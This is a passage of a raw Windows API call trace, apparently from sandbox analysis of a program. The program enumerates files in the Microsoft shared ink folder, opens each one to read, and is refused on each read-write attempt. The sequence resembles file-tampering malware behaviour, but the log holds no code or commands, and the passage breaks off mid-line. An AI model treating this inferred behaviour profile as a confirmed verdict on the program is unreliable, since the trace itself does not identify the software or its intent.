[0084.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0084.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0084.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0084.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60138 [0084.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0084.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0084.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60138 | out: hHeap=0x20000) returned 1 [0084.300] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.300] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.300] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.300] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0084.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.300] AreFileApisANSI () returned 1 [0084.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat", lpUsedDefaultChar=0x0) returned 64 [0084.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52dd0 [0084.300] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.300] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0084.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0084.300] AreFileApisANSI () returned 1 [0084.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0084.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0084.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x6ea48, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat") returned 64 [0084.300] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x334 [0084.301] GetFileType (hFile=0x334) returned 0x1 [0084.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0084.302] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.302] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.302] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.302] CloseHandle (hObject=0x334) returned 1 [0084.302] AreFileApisANSI () returned 1 [0084.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0084.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0084.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x6ea48, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat") returned 64 [0084.302] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.303] GetLastError () returned 0x5 [0084.303] GetLastError () returned 0x5 [0084.303] SetLastError (dwErrCode=0x5) [0084.303] GetLastError () returned 0x5 [0084.303] SetLastError (dwErrCode=0x5) [0084.303] GetLastError () returned 0x5 [0084.303] SetLastError (dwErrCode=0x5) [0084.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0084.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0084.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0084.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.303] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.303] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.303] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85cc99ae, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xb281a570, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb281a570, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x339380, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="hwrusash.dat", cAlternateFileName="")) returned 1 [0084.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0084.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0084.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0084.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0084.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0084.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0084.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0084.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x603f8 [0084.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0084.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0084.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0084.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x603f8 | out: hHeap=0x20000) returned 1 [0084.304] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.304] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.304] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.304] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0084.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.304] AreFileApisANSI () returned 1 [0084.304] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat", lpUsedDefaultChar=0x0) returned 64 [0084.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52dd0 [0084.304] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.304] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0084.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0084.304] AreFileApisANSI () returned 1 [0084.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0084.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0084.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x6ebe0, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat") returned 64 [0084.304] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x334 [0084.305] GetFileType (hFile=0x334) returned 0x1 [0084.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0084.305] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.305] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.305] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.305] CloseHandle (hObject=0x334) returned 1 [0084.305] AreFileApisANSI () returned 1 [0084.305] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0084.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e580 [0084.305] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x6e580, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat") returned 64 [0084.305] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.306] GetLastError () returned 0x5 [0084.306] GetLastError () returned 0x5 [0084.306] SetLastError (dwErrCode=0x5) [0084.306] GetLastError () returned 0x5 [0084.306] SetLastError (dwErrCode=0x5) [0084.306] GetLastError () returned 0x5 [0084.306] SetLastError (dwErrCode=0x5) [0084.306] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0084.306] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.306] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0084.306] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.306] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.306] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.306] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e38953f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e38953f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e38953f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x58400, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="InkDiv.dll", cAlternateFileName="")) returned 1 [0084.306] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.306] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.306] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0084.306] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.306] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0084.306] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.306] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.306] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.306] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0084.306] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.306] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0084.306] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.306] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0084.306] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.306] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0084.306] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.306] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.306] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0084.307] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.307] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0084.307] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0084.307] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.307] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0084.307] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0084.307] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.307] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.307] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.307] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.307] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0084.307] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.307] AreFileApisANSI () returned 1 [0084.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkDiv.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkDiv.dll", lpUsedDefaultChar=0x0) returned 62 [0084.307] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52dd0 [0084.307] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.307] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.307] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0084.307] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0084.307] AreFileApisANSI () returned 1 [0084.307] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.307] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ecf0 [0084.307] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x6ecf0, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkDiv.dll") returned 62 [0084.307] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkDiv.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkdiv.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0084.312] GetFileType (hFile=0x348) returned 0x1 [0084.312] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0084.312] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.312] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.312] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.312] CloseHandle (hObject=0x348) returned 1 [0084.313] AreFileApisANSI () returned 1 [0084.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6eb58 [0084.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x6eb58, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkDiv.dll") returned 62 [0084.313] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkDiv.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkdiv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.313] GetLastError () returned 0x5 [0084.313] GetLastError () returned 0x5 [0084.313] SetLastError (dwErrCode=0x5) [0084.313] GetLastError () returned 0x5 [0084.313] SetLastError (dwErrCode=0x5) [0084.313] GetLastError () returned 0x5 [0084.313] SetLastError (dwErrCode=0x5) [0084.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0084.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.313] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.313] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.313] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e38953f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e38953f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e38953f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1ecc00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="InkObj.dll", cAlternateFileName="")) returned 1 [0084.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0084.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0084.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0084.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.314] RtlAllocateHeap 